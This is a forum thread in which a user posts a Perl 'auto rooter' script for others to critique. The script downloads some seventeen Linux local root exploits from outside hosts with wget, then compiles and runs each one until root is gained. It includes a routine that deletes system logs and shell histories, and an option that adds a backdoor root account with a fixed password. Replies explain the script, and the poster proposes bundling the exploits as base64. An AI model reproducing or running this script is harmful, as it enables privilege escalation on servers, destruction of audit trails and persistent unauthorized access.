Dashboard Articles Playground Discussions More
Follow

ok heres an autoroot script i made

oxide
11 years ago

0

#!/usr/bin/perl  


print "###########################################################\n";  
print "#            Auto rooter by #0xide                                  #\n";  
print "#  Usage :                                                          #\n";  
print "#    perl $0 r00t    => To root                            #\n";  
print "#    perl $0 delete     => Delete Exploit                     #\n";  
print "#    perl $0 UserAdd    => Add Root Account                #\n";  
print "#      ********************************************                 #\n";  
print "#                                                                   #\n";  
print "#                                                                   #\n";  
print "#####################################################################\n\n\n";  
print "Gathering Exploit Database \n";  
print "18 exploits found \n";  
system("uname -a");  
system("id;pwd");  

check_root();     




if ($ARGV[0] =~ "r00t" ) {  




print "Trying wunderbar_emporium..\n";    
system("wget http://www.a4architect.com/wp-content/uploads/sock-sendpage-local-root-exploit/wunderbar_emporium.sh");  
system("chmod 777 wunderbar_emporium.sh");   

system("./wunderbar_emporium.sh");  
check_root();  








print "trying half-Nelson..\n";  
system("wget http://jon.oberheide.org/files/half-nelson.c");  
system(" gcc -o half_Nelson half-nelson.c");  
system("./half_Nelson");  
check_root();  

print " Trying mempodipper CVE_2012-0056 jan 21 2012..\n";  
system("wget http://downloads.securityfocus.com/vulnerabilities/exploits/51625.c");  
system("gcc -o MempoDip 51625.c");  
system("./MempoDip");  
check_root();  

print " Trying Linux Kernel 'MSR' Driver Local Privilege Escalation Vulnerability..\n";  
system("wget http://downloads.securityfocus.com/vulnerabilities/exploits/57838.c");  
system("gcc -o LinuxKMsr 57838.c");  
system("./LinuxKMsr");  
check_root();  

print "Trying  Diane Lane gets Fucked Hard..\n";  
system("wget http://downloads.securityfocus.com/vulnerabilities/exploits/27704-2.c");  
system("gcc -o diane 27704-2.c");  
system("./diane");  
check_root();  


print "Trying gayros...\n";  
system("wget http://www.fotis.loukos.me/security/exploits/gayros-2.c");  
system("gcc -o gayros local-root-exploit-gayros.c");  
system("chmod 777 gayros");  
system("./gayros");  


check_root();  






print "Trying vmsplice...\n";  
system("wget http://www.marsaud.org/divers/vmsplice-local-root-exploit.c");  
system("gcc -o vmsplice-local-root-exploit vmsplice-local-root-exploit.c");  
system("chmod 777 vmsplice-local-root-exploit");  
system("./vmsplice-local-root-exploit");  
check_root();  




print "Trying 2.4-2.6 [ pwned ] localroot...\n";  
system("wget http://downloads.securityfocus.com/vulnerabilities/exploits/pwnedUselibKernelExploit.c");  
system("gcc pwnedUselibKernelExploit.c -o pwned");  
system("chmod 777 pwned");  
system("./pwned");  
check_root();  

print  "Trying 2.6.4 [ hudo ] localroot...\n";  
system("wget http://downloads.securityfocus.com/vulnerabilities/exploits/hudo.c");  
system("gcc hudo.c -o hudo");  
system("chmod 777 hudo");  
system("./hudo");  
check_root();  

print "Trying 2.6.9-22 [ prctl ] localroot...\n";  
system("wget http://www.0xdeadbeef.info/exploits/raptor_prctl.c");  
system("gcc raptor_prctl.c -o prctl");  
system("chmod 777 prctl");  
system("./prctl");  
check_root();  

print "Trying 2.6.12 [ elfcd2 ] localroot...\n";  
system("wget http://rmccurdy.com/scripts/downloaded/localroot/Spaciel/elfcd2.c");  
system("gcc elfcd2.c -o elfcd2");  
system("chmod 777 elfcd2");  
system("./elfcd2");  
check_root();  


print "Trying 2.6.13-17 localroot...\n";  
system("wget http://rmccurdy.com/scripts/downloaded/localroot/Spaciel/2.6.13_17_4_2011.sh");  
system("chmod 755 2.6.13_17_4_2011.sh");  

system("./2.6.13_17_4_2011.sh");  

check_root();  




print "Trying 2.6.14 [ raptor ] localroot...\n";  
system("wget http://www.0xdeadbeef.info/exploits/raptor_udf.c");  
system("gcc raptor_udf.c -o raptor_udf");  
system("chmod 777 raptor_udf");  

system("./raptor_udf");  
check_root();  



print "Trying 2.6.15 [ raptor ] localroot...\n";  
system("wget http://www.0xdeadbeef.info/exploits/raptor_ldpreload.c");  
system("gcc raptor_ldpreload.c -o raptorpreload");  
system("chmod 777 raptorpreload");  

system("./raptorpreload");  
check_root();  



print "Trying 2.6.x localroot...\n";  
system("wget http://rmccurdy.com/scripts/downloaded/localroot/Spaciel/exp.sh");  
system("chmod 755 exp.sh");  
system("./exp.sh");  
check_root();  


print "Trying 2.6.x [ elflbl ] localroot...\n";  
system("wget http://rmccurdy.com/scripts/downloaded/localroot/Spaciel/elflbl");  
system("chmod 777 elflbl");  
system("./elflbl");  
check_root();  



print "Trying 2.6.x [ cw7.3 ] localroot...\n";  
system("wget http://rmccurdy.com/scripts/downloaded/localroot/Spaciel/cw7.3");  
system("chmod 777 cw7.3");  
system("./cw7.3");  
check_root();  


}  

sub check_root()  {   
my $login = (getpwuid $>); die "You've not root." if $login eq 'root';   


print "the exploit appears to have been succesful it is recommended to delete exploit files\n\n";  



#cleanup();  







}  

sub wipe_logs()  
{  
print "rm -rf Log [ rm ] \n";   
system ("rm -rf /tmp/logs");   
system ("rm -rf /root/.ksh_history");   
system ("rm -rf /root/.bash_history");   
system ("rm -rf /root/.bash_logout");   
system ("rm -rf /usr/local/apache/logs");   
sleep(2);   
system ("rm -rf /usr/local/apache/log");   
system ("rm -rf /var/apache/logs");   
system ("rm -rf /var/apache/log");   
system ("rm -rf /var/run/utmp");   
system ("rm -rf /var/logs");   
system ("rm -rf /var/log");   
sleep(2);   
system ("rm -rf /var/adm");   
system ("rm -rf /etc/wtmp");   
system ("rm -rf /etc/utmp");   
system ("cd /bin");   
print "completed ... \n\n";   

}  

sub cleanup(){  


print "All Exploits Files Are Being Deleted ...\n";  







#system("rm wunderbar_emporium.sh;rm -rf  half-nelson.c;rm 51625.c;rm -rf 57838.c;rm -rf 27704-2.c;rm -rf local-root-exploit-gayros.c;rm -rf vmsplice-local-root-exploit.c;rm -rf pwnedUselibKernelExploit.c;rm -rf hudo.c");  
#system("rm raptor_prctl.c;rm -rf elfcd2.c;rm 2.6.13_17_4_2011.sh;rm -rf raptor_udf.c;rm -rf raptor_ldpreload.c;rm -rf exp.sh;rm -rf elflbl;rm -rf cw7.3");  



}  

if ($ARGV[0] =~ "delete" ){  
cleanup();  
}    

     if ($ARGV[0] =~ "remove" )    
          {   
 wipe_logs();  
     }  
       if ($ARGV[0] =~ "UserAdd" )    
          {   
print "Add Root Account [ t ]\n";   
print "useradd : [ root0xide ]\n";   
system ("useradd root0xide -g 0 autoroot -G wheel,sys,bin,daemon,adm,disk -d /sf7 -s /bin/sh");   
system ("passwd root0xide");   
print "pass is : root0xide right it down check it twice \n";   
sleep(2);    

     }

if this is fucked up or needs help let me know as this is my first try at it and havent run it live due to not wanting to drop a server give it a shot let me know if it is good

 

i bake therefore im fried!!

Image

9replies
6voices
375views
tmcocoran99
11 years ago

0

What does it do?

James Singh [cpn1000]
11 years ago

0

I am just as lost.

 

Image
“When you die I will laminate you’re skeleton and pose you in the lobby.”
Veni Vidi Vici

Pawda [Memoria]
11 years ago

0

Nothing more special than it has been said. By downloading many exploits, this script will try to unlock a root account on the machine you run it.
According the first parameter you give it will, do nothing, try to root, display a useless message, remove logs, add a root user with a dedicace to the op.

 

Image

oxide
11 years ago | edited 11 years ago

0

ya its not altogether impressive but i tried i have never done this stuff before so i like to look at alot of code learn from it try to adapt it differently to suit my needs i have learned alot from code i have seen i doubt this even works but id like to know

 

i bake therefore im fried!!

Image

[IAmDevil]
11 years ago

0

I too haven’t tried that stuff yet !!!
But understood the logic there !!! :D
probably I’ll go learn first !!!

 

- @IAmDevil
Its good to be back! :D

oxide
11 years ago

0

ya i wont run it due to the worry of dos attack by accident

 

i bake therefore im fried!!

Image

lodovico65
11 years ago

0

The script does nothing impressive but the perl language although it is now considered obsolete by many, remains my favorite language because it is concise and elegant. Love at first sight!

 

daVinciCode

oxide
11 years ago

0

root = very impressive lol

 

i bake therefore im fried!!

Image

oxide
11 years ago

0

the right way to do this is probably store the exeploits local as base 64 and than convert back to exploit it due to the fact the links may go down it would be a more modular approach anyone agree

 

i bake therefore im fried!!

Image

You must be logged in to reply to this discussion. Login
1 of 10

This site only uses cookies that are essential for the functionality of this website. Cookies are not used for tracking or marketing purposes.

By using our site, you acknowledge that you have read and understand our Privacy Policy, and Terms of Service.

Dismiss